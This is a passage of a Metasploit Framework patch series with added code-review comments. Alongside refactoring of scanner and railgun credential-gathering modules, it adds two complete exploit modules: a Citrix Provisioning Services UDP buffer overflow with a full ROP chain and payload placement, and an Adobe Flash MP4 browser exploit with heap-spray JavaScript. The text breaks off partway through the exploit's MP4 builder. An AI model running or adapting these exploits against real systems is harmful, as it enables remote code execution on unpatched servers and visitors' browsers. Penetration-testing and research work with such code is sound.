diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index eb51cec408..cd609022c6 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP External address scanner', + 'Name' => 'NAT-PMP External Address Scanner', 'Description' => 'Scan NAT devices for their external address using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -25,15 +25,15 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} }) add_socket(udp_sock) print_status "#{host}:#{datastore['RPORT']} - NATPMP - Probing for external address" if (datastore['VERBOSE']) udp_sock.sendto(Rex::Proto::NATPMP.external_address_request, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(12, 0.25) and r[1]) + while (r = udp_sock.recvfrom(12, 1.0) and r[1]) handle_reply(host, r) end rescue ::Interrupt @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused nil rescue ::Exception => e - print_error("Unknown error: #{e.class} #{e}") + print_error("#{host}:#{datastore['RPORT']} Unknown error: #{e.class} #{e}") end end 
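Review bot: `rescue ::Exception => e`, now printing `#{host}:#{datastore['RPORT']} Unknown error: …`, also catches `SystemExit`, `NoMemoryError` and `SignalException`, so an exit request or signal raised inside `handle_reply` is logged as an unknown error and the scan carries on; `rescue ::StandardError => e` is the right net after the explicit `::Interrupt` and Rex rescues above it. The @@ -25 hunk quadruples the `recvfrom` timeout to 1.0 s per host with no explanation — a short why-comment on that line would stop the next person from lowering it again; the same change appears twice in natpmp_portscan.rb (@@ -52). `run_host` spans the @@ -25 and @@ -41 hunks.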
@@ -65,18 +65,20 @@ class Metasploit3 < Msf::Auxiliary ) # also report its external address as alive - report_host( - :host => external_address, - :state => Msf::HostState::Alive - ) + if inside_workspace_boundary(external_address) + report_host( + :host => external_address, + :state => Msf::HostState::Alive + ) + end # report NAT-PMP as being open report_service( :host => host, :port => pkt[2], :proto => 'udp', - :name => 'natpmp', - :state => Msf::ServiceState::Open + :name => 'natpmp', + :state => Msf::ServiceState::Open ) end end diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index c47e13fbec..5b6edd1543 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP External port scanner', + 'Name' => 'NAT-PMP External Port Scanner', 'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} } + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} } ) add_socket(udp_sock) print_status "Scanning #{datastore['PROTOCOL']} ports #{datastore['PORTS']} on #{host} using NATPMP" if (datastore['VERBOSE']) 
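Review bot: `'Context' => {'Msf' => framework, 'MsfExploit' => self} }` followed by `)` on its own line leaves the hash brace and the call paren split across lines, unlike the `})` form the same commit gives natpmp_map.rb and natpmp_external_address.rb; closing with `})` here keeps the three modules identical. `run_host` starts in the hunk and continues past it.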
@@ -52,13 +52,13 @@ class Metasploit3 < Msf::Auxiliary # send one request to clear the mapping if *we've* created it before clear_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 0) udp_sock.sendto(clear_req, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(16, 0.25) and r[1]) + while (r = udp_sock.recvfrom(16, 1.0) and r[1]) end # now try the real mapping map_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1) udp_sock.sendto(map_req, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(16, 0.25) and r[1]) + while (r = udp_sock.recvfrom(16, 1.0) and r[1]) handle_reply(host, external_address, r) end end @@ -98,12 +98,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG']) end - report_service( - :host => external_addr, - :port => int, - :proto => protocol, - :state => state - ) + if inside_workspace_boundary(external_addr) + report_service( + :host => external_addr, + :port => int, + :proto => protocol, + :state => state + ) + end report_service( :host => host, From 3d1c8ae3830a4964138a4d2373ec50a8e59f6b9a Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 6 Feb 2012 17:46:42 -0700 Subject: [PATCH 07/15] Fix another errant use of dprintf --- .../meterpreter/source/extensions/networkpug/networkpug.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/external/source/meterpreter/source/extensions/networkpug/networkpug.c b/external/source/meterpreter/source/extensions/networkpug/networkpug.c index f830f94146..d7277aa5bc 100644 --- a/external/source/meterpreter/source/extensions/networkpug/networkpug.c +++ b/external/source/meterpreter/source/extensions/networkpug/networkpug.c 
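Review bot: with the timeout raised to 1.0 s, the empty `while (r = udp_sock.recvfrom(16, 1.0) and r[1]) end` drain loop only exits on a timeout and the real mapping loop below it does the same, so every port now costs at least two seconds even when the device answers instantly; reading the clear-mapping reply with a short timeout (it is discarded anyway) keeps that step cheap instead of turning a port list into a multi-minute scan. The guarded `report_service` in the @@ -98 hunk is the third copy of the same guard shape (natpmp_map.rb @@ -96, natpmp_external_address.rb @@ -65); a small helper in the shared NAT-PMP code would keep the three in step. The port loop in `run_host` starts outside the hunk, and the `and` in the `while` condition is load-bearing (`&&` would bind into the assignment), which deserves a comment.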
@@ -178,7 +178,7 @@ void free_networkpug(NetworkPug *np, int close_channel, int destroy_channel) cont = __atomic_swap(0, &np->active); if(! cont) { - dprintf("Seems the pug at %p was already set free"); + dprintf("Seems the pug at %p was already set free", &np); return; } From 1f1e67cb16d579f04c16caca85307102d122eb1d Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Thu, 9 Feb 2012 04:56:13 +0000 Subject: [PATCH 08/15] Moved railgun function definitions into central storage and out of individual modules where possible --- .../stdapi/railgun/def/def_netapi32.rb | 11 +++++ .../stdapi/railgun/def/def_ws2_32.rb | 6 +++ .../windows/escalate/net_runtime_modify.rb | 14 ++----- .../windows/escalate/service_permissions.rb | 7 +--- .../gather/credentials/enum_picasa_pwds.rb | 12 ------ .../windows/gather/credentials/outlook.rb | 12 ------ modules/post/windows/gather/enum_domains.rb | 26 ------------ modules/post/windows/gather/reverse_lookup.rb | 6 --- .../recon/computer_browser_discovery.rb | 41 ------------------- .../post/windows/recon/resolve_hostname.rb | 1 - 10 files changed, 22 insertions(+), 114 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb index d4a8299319..ad62b0f5f3 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb @@ -21,6 +21,17 @@ class Def_netapi32 ["PDWORD","lpNameBugger","out"], ["PDWORD","BufferType","out"] ]) + dll.add_function('NetServerEnum', 'DWORD',[ + ["PWCHAR","servername","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"], + ["DWORD","servertype","in"], + ["PWCHAR","domain","in"], + ["DWORD","resume_handle","inout"] + ]) return dll end 
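Review bot: The added argument `&np` is the address of the local pointer variable, not the pug the message talks about, so `%p` prints a stack slot rather than the object; the parameter value itself is what the text describes: `dprintf("Seems the pug at %p was already set free", np);`. The commit fixes the missing-argument bug but at one level of indirection too many. free_networkpug's body continues outside the hunk.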
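Review bot: The central `NetServerEnum` definition types `resume_handle` as `"DWORD"` with direction `"inout"`, whereas the definition this commit removes from enum_domains.rb (its `@@ -25,32 +25,6 @@` hunk) declared it `'PDWORD'`, and the one removed from computer_browser_discovery.rb declared `servername` as `"PBLOB"` rather than `"PWCHAR"`; the call sites in those modules are not in this diff, so whether the values they pass match the new parameter types cannot be confirmed here and should be checked before the per-module definitions go. If a non-pointer `inout` argument is not meaningful to railgun, `["PDWORD","resume_handle","inout"]` is the declaration that keeps the previous enum_domains.rb behaviour. A short comment above the block naming which modules depend on this definition would make the next such consolidation safer.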
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb index 01aed5e7ad..a35e0a3fcc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb @@ -18,6 +18,12 @@ class Def_ws2_32 ["PDWORD","ppResult","out"] ]) + dll.add_function('gethostbyaddr', 'DWORD', [ + ['PCHAR', 'addr', 'in'], + ['DWORD','len','in'], + ['DWORD','type','in'] + ]) + dll.add_function('WSAAccept', 'DWORD',[ ["DWORD","s","in"], ["PBLOB","addr","inout"], diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 77699a5e64..2b0a6d4a75 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -124,16 +124,10 @@ class Metasploit3 < Msf::Post def init_railgun begin - # load the dlls we need - if session.railgun.get_dll("advapi32").nil? - print_status("Loading advapi.dll...") - session.railgun.add_dll("advapi32", 'C:\\WINDOWS\\system32\\advapi32.dll') - end - - if session.railgun.advapi32.functions['DeleteService'].nil? - session.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ]]) - end + rg = session.railgun + if (!rg.get_dll('advapi32')) + rg.add_dll('advapi32') + end rescue Exception => e print_error("Could not initalize railgun") print_error("Railgun Error: #{e}") diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 3cfb2cf1dc..68fb61d4c8 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb 
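Review bot: `gethostbyaddr` is declared with a `'DWORD'` return, but the Winsock function returns a pointer to a `hostent` structure, so on an x64 session a caller reading the declared 32-bit value would get a truncated pointer; the definition removed from reverse_lookup.rb carried the same type, so this is inherited rather than introduced, but a pointer-width return type, if railgun offers one for this declaration, would be the accurate choice. A comment such as `# returns a pointer to a hostent struct, not a status code` would warn callers that the value must be dereferenced with further railgun calls. The surrounding `add_function` calls are unchanged context.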
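Review bot: The replacement block in `init_railgun` no longer declares `DeleteService` before it is used, relying instead on the central advapi32 definition; that file is not part of this diff, so its presence there cannot be confirmed here, and the deletion in service_permissions.rb (`@@ -110,12 +110,7 @@`) introduces the same dependency. The `if (!rg.get_dll('advapi32'))` form reads better as `rg.add_dll('advapi32') unless rg.get_dll('advapi32')`. The `rescue Exception => e` that follows is pre-existing context, but it also swallows interrupts and exit requests; `rescue StandardError => e` is the safer net for a railgun setup failure. The method's remaining lines are outside the hunk.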
@@ -110,12 +110,7 @@ class Metasploit3 < Msf::Post end #attempt to make new service - client.railgun.kernel32.LoadLibraryA("advapi32.dll") - client.railgun.get_dll('advapi32') - client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ] - ]) - + #SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config print_status("Trying to add a new service...") diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 99ab957903..49cc85c0e2 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -45,18 +45,6 @@ class Metasploit3 < Msf::Post if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end - - if (!rg.crypt32.functions["CryptUnprotectData"]) - rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [ - ["PBLOB","pDataIn", "in"], - ["PWCHAR", "szDataDescr", "out"], - ["PBLOB", "pOptionalEntropy", "in"], - ["PDWORD", "pvReserved", "in"], - ["PBLOB", "pPromptStruct", "in"], - ["DWORD", "dwFlags", "in"], - ["PBLOB", "pDataOut", "out"] - ]) - end end diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index 5e5e92e5c4..1d5211be41 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -41,18 +41,6 @@ class Metasploit3 < Msf::Post if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end - - if (!rg.crypt32.functions["CryptUnprotectData"]) - rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [ - ["PBLOB","pDataIn", "in"], - ["PWCHAR", "szDataDescr", "out"], - ["PBLOB", "pOptionalEntropy", "in"], - ["PDWORD", "pvReserved", "in"], - ["PBLOB", "pPromptStruct", "in"], - ["DWORD", "dwFlags", "in"], - ["PBLOB", "pDataOut", "out"] - ]) - end end 
diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 843aa4102b..9ec30cb134 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -25,32 +25,6 @@ class Metasploit3 < Msf::Post end def run - #structure -=begin - NET_API_STATUS NetServerEnum( - __in_opt LPCWSTR servername, - __in DWORD level, - __out LPBYTE *bufptr, - __in DWORD prefmaxlen, - __out LPDWORD entriesread, - __out LPDWORD totalentries, - __in DWORD servertype, - __in_opt LPCWSTR domain, - __inout_opt LPDWORD resume_handle - ); -=end - - client.railgun.add_function('netapi32', 'NetServerEnum', 'DWORD',[ - ['PWCHAR','servername','in'], - ['DWORD','level','in'], - ['PDWORD','bufptr','out'], - ['DWORD','prefmaxlen','in'], - ['PDWORD','entriesread','out'], - ['PDWORD','totalentries','out'], - ['DWORD','servertype','in'], - ['PWCHAR','domain','in'], - ['PDWORD','resume_handle','inout'] - ]) domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000 buffersize = 500 diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index c03925e4f6..10b2b760ec 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -53,12 +53,6 @@ class Metasploit3 < Msf::Post end end - #Initialize Railgun 'gethostbyaddr' call' - session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [ - ['PCHAR', 'addr', 'in'], - ['DWORD','len','in'], - ['DWORD','type','in']]) - #Generates IP list based on RHOSTS - RangeWalker rocks.... iplist = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index 5e4c355100..9c32f85217 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb 
@@ -68,47 +68,6 @@ class Metasploit3 < Msf::Post ### MAIN ### client = session -=begin -NET_API_STATUS NetUserEnum( - __in LPCWSTR servername, - __in DWORD level, - __in DWORD filter, - __out LPBYTE *bufptr, - __in DWORD prefmaxlen, - __out LPDWORD entriesread, - __out LPDWORD totalentries, - __inout LPDWORD resume_handle -); - -client.railgun.add_function( 'netapi32', 'NetUserEnum', 'DWORD',[ -["PWCHAR","servername","in"], -["DWORD","level","in"], -["DWORD","filter","in"], -["PDWORD","bufptr","out"], -["DWORD","prefmaxlen","in"], -["PDWORD","entriesread","out"], -["PDWORD","totalentries","out"], -["PDWORD","resume_handle","inout"]]) - -=end - - client.railgun.add_function( - 'netapi32', 'NetServerEnum', 'DWORD', - [ - ["PBLOB","servername","in"], ["DWORD","level","in"], ["PDWORD","bufptr","out"], - ["DWORD","prefmaxlen","in"], ["PDWORD","entriesread","out"], ["PDWORD","totalentries","out"], - ["DWORD","servertype","in"], ["PWCHAR","domain","in"], ["DWORD","resume_handle","inout"] - ] - ) - - client.railgun.add_function( - 'ws2_32', 'getaddrinfo', 'DWORD', - [ - ["PCHAR","pNodeName","in"], ["PCHAR","pServiceName","in"], - ["PDWORD","pHints","in"], ["PDWORD","ppResult","out"] - ] - ) - domain = nil # Default = SV_TYPE_NT diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb index 4246a8ebc1..e0dcd85148 100644 --- a/modules/post/windows/recon/resolve_hostname.rb +++ b/modules/post/windows/recon/resolve_hostname.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post def run ### MAIN ### - client.railgun.add_function( 'ws2_32', 'getaddrinfo', 'DWORD',[["PCHAR","pNodeName","in"],["PCHAR","pServiceName","in"],["PDWORD","pHints","in"],["PDWORD","ppResult","out"]]) if client.platform =~ /^x64/ size = 64 From 3312a16708fadd7e35c67af0264810297f2e6033 Mon Sep 17 00:00:00 2001 
From: Rob Fuller Date: Thu, 9 Feb 2012 05:49:40 +0000 Subject: [PATCH 09/15] Added a message when backgrounding a session --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 492ecb0939..0a85d3ce1f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -83,6 +83,7 @@ class Console::CommandDispatcher::Core end def cmd_background + print_status "Backgrounding session #{client.name}..." client.interacting = false end From 2bd330da337053510f14ca8118aa3435a8e974a2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 00:06:48 -0600 Subject: [PATCH 10/15] Add ZDI-12-009 Citrix Provisioning Services 5.6 streamprocess buffer overflow exploit --- .../misc/citrix_streamprocess_data_msg.rb | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb new file mode 100644 index 0000000000..5a2ea1be72 --- /dev/null +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb 
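Review bot: The new status line calls `print_status` without parentheses around its argument; `print_status("Backgrounding session #{client.name}...")` matches the convention for calls with arguments and avoids the parsing ambiguity an interpolated string can introduce. Whether `client.name` is always populated at this point cannot be confirmed from the hunk, so a nil name would print as an empty string rather than fail.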
@@ -0,0 +1,116 @@ +## +# $Id: $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow', + 'Description' => %q{ + This module exploits a remote buffer overflow in the Citrix Provisioning Services + 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the + 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, + Windows 7, and Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AbdulAziz Hariri', # Initial discovery via ZDI + 'alino <26alino[at]gmail.com>' # Metasploit module + ], + 'Version' => '$Revision: $', + 'References' => + [ + ['BID', '49803'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'], + ['URL', 'http://support.citrix.com/article/CTX130846'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'BadChars' => "\x00", + 'EncoderOptions' => {'BufferRegister'=>'ECX'}, + }, + 'Platform' => ['win'], + 'Targets' => + [ + [ 'Citrix Provisioning Services 5.6 SP1', + { + 'Offset' => 2012, + 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(6905)], self.class) + end + + def exploit + + packet = "\x00\x00\x02\x40" # DATA MSG + packet << rand_text_alpha_upper(18) + packet << "\x00\x00\x00\x00" # Length + packet << rand_text_alpha_upper(target['Offset']) + 
packet << [target.ret].pack('V') + + rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe + + rop_gadgets = + [ + 0x0045b141, # POP EAX; RETN streamprocess.exe + 0x1009a1bc, # VirtualProtect() + 0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe + 0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe + 0x004ad0cf, # POP EBP; RETN streamprocess.exe + 0x00455d9d, # PUSH ESP; RETN streamprocess.exe + 0x00497f5a, # POP EAX; RETN streamprocess.exe + 0xfffff9d0, # dwSize + 0x00447669, # NEG EAX; RETN streamprocess.exe + 0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe + 0x00426305, # POP ECX; RETN streamprocess.exe + 0x00671fb9, # lpflOldProtect + 0x004e41e6, # POP EDI; RETN streamprocess.exe + 0x0040f004, # RETN streamprocess.exe + 0x00495c05, # POP EAX; RETN streamprocess.exe + 0xffffffc0, # flNewProtect + 0x0042c79a, # NEG EAX; RETN streamprocess.exe + 0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe + 0x0045c1fa, # POP EAX; RETN streamprocess.exe + 0x90909090, # NOP + 0x00435bbe, # PUSHAD; RETN streamprocess.exe + ].pack("V*") + + packet[258, rop_nop.length] = rop_nop + packet[410, rop_gadgets.length] = rop_gadgets + packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff" + packet[504, payload.encoded.length] = payload.encoded + + print_status("Trying target #{target.name}...") + + connect_udp + udp_sock.put(packet) + + handler + disconnect_udp + end +end \ No newline at end of file From e5ea2961f546f43947d03b19dd83911207ad6109 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 00:10:28 -0600 Subject: [PATCH 11/15] Add CVE-2011-2140 Adobe Flash SequenceParameterSetNALUnit (mp4) bof --- .../windows/browser/adobe_flash_sps.rb | 326 ++++++++++++++++++ 1 file changed, 326 insertions(+) create mode 100644 modules/exploits/windows/browser/adobe_flash_sps.rb 
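Review bot: The four fixed write positions in `exploit` (`packet[258, …]`, `packet[410, …]`, `packet[494, 10]`, `packet[504, …]`) overwrite parts of the `rand_text_alpha_upper(target['Offset'])` filler, but nothing in the method or the target hash says what each region is or how the positions relate to `Offset`, so a maintainer adjusting one value cannot tell what else must move; a short comment above the first assignment describing the packet layout would carry that knowledge. The ten-byte literal written at `packet[494, 10]` likewise deserves a comment naming its role, as the ROP entries already have. The file is also missing its trailing newline.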
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb new file mode 100644 index 0000000000..3842483c90 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb 
@@ -0,0 +1,326 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx + component. When processing a MP4 file (specifically the Sequence Parameter Set), + Flash will see if pic_order_cnt_type is equal to 1, which sets the + num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in + offset_for_ref_frame on the stack, which allows arbitrary remote code execution + under the context of the user. Numerous reports also indicate that this + vulnerability has been exploited in the wild. + + Please note that the exploit requires a SWF media player in order to trigger + the bug, which currently isn't included in the framework. However, software such + as Longtail SWF Player is free for non-commercial use, and is easily obtainable. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Alexander Gavrun', #RCA + 'Abysssec', #PoC + 'sinn3r' #Metasploit + ], + 'References' => + [ + [ 'CVE', '2011-2140' ], + [ 'BID', '49083' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ], + [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ], + [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ], + [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'ExitFunction' => "seh", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on + [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2011", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']), + OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player']) + ], self.class) + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ + return targets[1] + elsif agent =~ /MSIE 7/ + return targets[2] + else + return nil + end + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if the victim doesn't have the same setup we're targeting + if my_target.nil? 
+ print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") + send_not_found(cli) + return + end + + # The SWF requests our MP4 trigger + if request.uri =~ /\.mp4$/ + print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...") + #print_error("Sorry, not sending you the mp4 for now") + #send_not_found(cli) + send_response(cli, @mp4, {'Content-Type'=>'video/mp4'}) + return + end + + # Set payload depending on target + p = payload.encoded + + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + + js = <<-JS + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + + heap_obj.gc(); + + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + JS + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + myhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] + mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" + swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}" + + html = %Q| + + + + + + + + + + + | + + html = html.gsub(/^\t\t/, '') + + print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + + def exploit + @mp4 = create_mp4 + super + end + + def create_mp4 + ftypAtom = "\x00\x00\x00\x20" #Size + ftypAtom << "ftypisom" + ftypAtom << "\x00\x00\x02\x00" + ftypAtom << "isomiso2avc1mp41" + + mdatAtom = "\x00\x00\x00\x10" #Size + mdatAtom << "mdat" + mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF" + + moovAtom1 = "\x00\x00\x08\x83" #Size + moovAtom1 << "moov" #Move header box header + moovAtom1 << "\x00\x00\x00" + moovAtom1 << "lmvhd" # Type + moovAtom1 << "\x00\x00\x00\x00" # Version/Flags + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x03\xE8" # Time scale + moovAtom1 << "\x00\x00\x2F\x80" # Duration + moovAtom1 << 